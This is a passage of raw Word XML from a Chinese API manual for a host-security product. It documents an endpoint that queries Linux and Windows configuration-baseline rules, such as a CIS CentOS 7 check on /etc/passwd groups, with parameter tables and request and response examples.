      <w:bookmarkStart w:id="359" w:name="_Toc115166252"/>
      <w:bookmarkStart w:id="360" w:name="查询基线规则"/>
      <w:bookmarkEnd w:id="358"/>
      <w:r>
        <w:t>查询基线规则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="359"/>
    </w:p>
    <w:p w14:paraId="0444ADB2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C82642" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/baseline/spec/rule/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E708C56" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>：检查</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>项数据</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>较多，最终汇总的数据量较大，接口性能受影响</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC4C1B1"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44"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="3792"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="47A76FE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D478649" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BF7500D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29C6B8AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="16FB9601" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D7DE84E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6245F949" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31795696" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">操作系统，必填 1 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 2 windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4D80322C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CB67237" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E487742" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>inti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D13D933" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>基线类别，必填 1 系统基线 2 应用基线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7A0E7FF9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A11A81D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="226B2A1E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="043B829D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>使用系统， 系统基线时过滤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="154943FF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1950637A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>appId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C050814" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2813A90E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>应用id， 应用基线时过滤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36C2532C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FD880A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">": 1,  //操作系统，必填 1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2 windows</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "family": 1,  //基线类别，必填 1 系统基线 2 应用基线</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>plaform</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "ubuntu-16.04", //使用系统， 系统基线时过滤</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "6871696328758afa" //应用id， 应用基线时过滤</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3458C54B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C95AA08" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "id":"5fba7c27fc524b1a0831",    // 规则id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userRule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name":"CIS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Centos 7 Level 2",    // </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>规则名</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osTag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "centos-7"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ],    // 适用平台</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,    // 适用应用-应用名：应用基线规则</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appVersion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,   // 适用应用-应用版本集：应用基线规则</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "family": 1, //基线类别，必填 1 系统基线 2 应用基线</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appRule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":false,    // 是否应用基线</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "needAuthCount":0,    // 应用基线需要授权的检查项</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "checkTotal":10,    // 基线规则包含的检查项条数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "id" : "0c1a041e6a24b10b3683",  //检查项ID</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "name" : "检查/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd 中的所有组在 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/group是否存在",  //检查项名称</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "category" : "用户和</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>组设置</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>",  //类别</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                "description" : "随着时间的推移，系统管理错误和更改可能</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>导致组</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>在 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd 中但不在 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/group 中定义。",  //描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "content" : "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd 中的所有组在 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/group都应存在",  //内容</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "reference" : "",  //引用信息</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>needAuth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : false //是否需要授权</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A8E24E"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702"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="3792"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="5AB544A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DFE854D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="284CD94E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27394268" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="538FC197" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7718AA30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0845F19F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E530FBD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>规则id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="20396F93" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D02A87A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>userRule</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A063C5D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C46B924" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否是用户规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="074EB328" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="567A178B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24E611BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2942EB6E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>规则名</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="68A4C2D0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="713BB0FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osTag</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A01C13D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="505F0738" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>适用平台</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4DC6F4B4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13D28CBE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>appName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F6E0D13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BF84049" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>适用应用-应用名：应用基线规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="52EBA62B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64A68278" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>appVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62E810B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BD5C4CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>适用应用-应用版本集：应用基线规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0CAB1D1F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3552945E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C129E55" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="315107F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>基线类别，必填 1 系统基线 2 应用基线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="67E83F63" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B88DCF2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>appRule</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C90E99B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E5EDA45" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否应用基线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4009A133" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53D4AD41" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>needAuthCount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21076CDC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34E7EA05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>应用基线需要授权的检查项</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="394B3C4F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C7A0422" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>checkTotal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FFD67B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
